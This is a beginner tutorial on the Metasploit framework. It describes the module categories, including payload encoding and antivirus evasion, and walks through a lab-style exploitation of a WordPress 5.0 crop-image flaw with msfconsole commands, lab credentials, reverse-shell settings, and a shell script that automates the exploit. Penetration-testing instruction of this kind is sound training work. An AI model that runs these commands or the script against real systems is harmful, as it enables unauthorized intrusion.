Metasploit is an open-source penetration testing framework: a suite of tools for information gathering, scanning, exploitation, payload encoding, antivirus evasion and post-exploitation. The framework is organized into categories of modules that cover every phase of an engagement, from reconnaissance through post-exploitation and clean-up. This is a beginner-friendly tutorial on getting started with the Metasploit framework and its basic commands.
Msfconsole is the primary interface to the Metasploit framework. It is a command-line console, launched by typing msfconsole in a terminal, from which we select modules, set their options and run them. Armitage is a GUI front end for the framework. Metasploit itself is pre-installed in Kali Linux. One advantage of msfconsole over a GUI is that external commands such as ping or ifconfig can be run from inside the console, and it provides tab completion for commands and module names.
Major Categories of Metasploit
The Metasploit framework organizes its modules into seven major categories, each used in a different phase of an engagement. A brief introduction to each of the seven categories is given below:
Category 1: Exploit
An exploit module is code that takes advantage of a specific vulnerability in the target system. Exploit modules are organized by platform and service (for example exploit/multi/http/), with one module per vulnerability the framework supports.
Category 2: Auxiliary
Modules in this category perform tasks that do not deliver a payload, mostly scanning and information gathering. Scanners, crawlers, sniffers and fuzzers are found here.
Category 3: Payload
A payload is the code that runs on the target after the exploit succeeds. The exploit only triggers the vulnerability; to get the result we actually want (a reverse shell, a Meterpreter session, a backdoor) we pair the exploit with a payload.
Category 4: Post
Post contains the modules used in the post-exploitation phase. They run against an existing session, for example to gather credentials or enumerate the compromised host.
Category 5: Encoders
Encoders transform a payload before it is sent. Their original purpose is to avoid bytes the exploit cannot deliver (a null byte in a string-based overflow, for instance); as a side effect the encoded payload no longer matches a static signature. Encoding may get past some signature-based antivirus, but well-known encoders such as shikata_ga_nai are themselves signatured, so encoding alone should not be relied on for evasion.
Category 6: NOP (No Operation)
NOP generators produce sequences of no-operation instructions (NOP sleds). They are used to pad a payload to a required size and to make exploits with an imprecise return address more reliable; when executed, the generated bytes do nothing.
Category 7: Evasion
Evasion modules generate payload files that use techniques beyond simple encoding to avoid detection by antivirus software.
Examples of Metasploit
Below is a worked example of exploiting a vulnerability in WordPress 5.0 to gain access to the target system. An nmap version scan (nmap -sV <IP>) shows a web server on the target, and enumerating the site shows it is running WordPress 5.0. The following msfconsole commands walk through the process of exploiting it.
Step 1: Searchsploit
Searchsploit is a command-line search tool for Exploit-DB, used to find publicly known exploits for an operating system, application or service found on the target. Its results are Exploit-DB entries rather than Metasploit modules; many have a corresponding module in the framework, which the search command inside msfconsole (Step 2) will confirm.
Step 2: Search
The search command searches module names and descriptions for modules that leverage a known vulnerability in a given service or application. Results carry a rank (excellent, great, good, and so on) that reflects how reliable the module is, and we pick the relevant module accordingly. Extra keywords narrow the results; in the example below we also give the kind of exploit we are looking for.
msf6 > search wordpress 5.0 crop image
Step 3: Use
The use command selects the exploit or payload module we are going to run against the vulnerable version of the software or service. Once a module is selected we can set its options, such as the target and our own host, before running it.
msf6 > use exploit/multi/http/wp_crop_rce
The module can also be selected with use followed by the index number shown at the start of each search result line.
Step 4: Info
The info command prints the details of the selected module: its name, description, authors, disclosure date, rank, available targets, options and references such as CVE identifiers.
msf6 > info
Step 5: Show
The show options command lists every option the selected module accepts, which ones are required, and their current values. After selecting an exploit with use, we typically have to set the target's IP address and port, and, for an exploit that needs authentication to the application (as the WordPress module here does), a username and password. Any required option that is still empty must be set before the module will run.
msf6 > show options
Step 6: Set
The set command assigns the options listed by show options, such as RHOSTS, RPORT, LHOST, LPORT, USERNAME and PASSWORD. RHOSTS and RPORT are the target's IP address (or address range) and port. LHOST and LPORT are our own IP address and port, which a reverse payload connects back to, so LHOST must be an address the target can reach.
msf6 > set LHOST 10.18.51.89
msf6 > set RHOSTS 10.10.36.242
msf6 > set USERNAME kwheel
msf6 > set PASSWORD cutiepie1
Step 7: run/exploit
The run command (or its alias exploit) launches the module once the required options are set. What we get back depends on the payload: a reverse TCP shell, a Meterpreter session or a bind shell. The session runs with the privileges of the exploited service (the web server user in the WordPress case), not necessarily root, so privilege escalation is a separate step.
msf6 > exploit
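The whole of Steps 3 to 7 can be captured in a Metasploit resource script (.rc), which msfconsole replays line by line with -r. The shell script below is an added example, not part of the original tutorial: it writes such a script for the wp_crop_rce module, verifies its contents, and starts msfconsole only if it is installed. The addresses, the credentials, the output path /tmp/wp_crop.rc and the helper names write_rc and rc_has are constructed for illustration. The script also issues check before exploit; if a module has no check method msfconsole simply reports that and carries on.

```shell
#!/bin/sh
# Added example: build a Metasploit resource script for the wp_crop_rce
# workflow (Steps 3-7 of the tutorial) and hand it to msfconsole.
# Hosts, credentials and the output path are placeholders.

# write_rc OUTFILE LHOST RHOSTS USERNAME PASSWORD
# Writes the msfconsole commands of Steps 3-7 into OUTFILE so the run is
# reproducible. Returns 1 if any argument is missing.
write_rc() {
    out=$1
    lhost=$2
    rhosts=$3
    user=$4
    pass=$5
    if [ -z "$out" ] || [ -z "$lhost" ] || [ -z "$rhosts" ] \
        || [ -z "$user" ] || [ -z "$pass" ]; then
        echo "usage: write_rc OUTFILE LHOST RHOSTS USERNAME PASSWORD" >&2
        return 1
    fi
    # RHOSTS (plural) is the target; LHOST is the address the reverse
    # payload connects back to. RPORT 80 and LPORT 4444 are the defaults.
    cat > "$out" <<EOF
use exploit/multi/http/wp_crop_rce
set RHOSTS $rhosts
set RPORT 80
set LHOST $lhost
set LPORT 4444
set USERNAME $user
set PASSWORD $pass
show options
check
exploit
EOF
}

# rc_has OUTFILE LINE: returns 0 if LINE is present as an exact line.
# Used to confirm the script before msfconsole runs it.
rc_has() {
    grep -qxF "$2" "$1"
}

# Example run with the lab addresses used in the tutorial text.
RC=${RC:-/tmp/wp_crop.rc}
write_rc "$RC" 10.18.51.89 10.10.36.242 kwheel cutiepie1 || exit 1
rc_has "$RC" "set RHOSTS 10.10.36.242" || exit 1

# -q suppresses the banner, -r replays the resource script.
if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$RC"
else
    echo "msfconsole not found; resource script written to $RC"
fi
```

The WordPress account given to USERNAME and PASSWORD must be able to upload and crop images (Author role or higher) for this module to work, and LHOST must be the address of an interface the target can reach; a wrong LHOST is the most common reason a reverse payload never calls back.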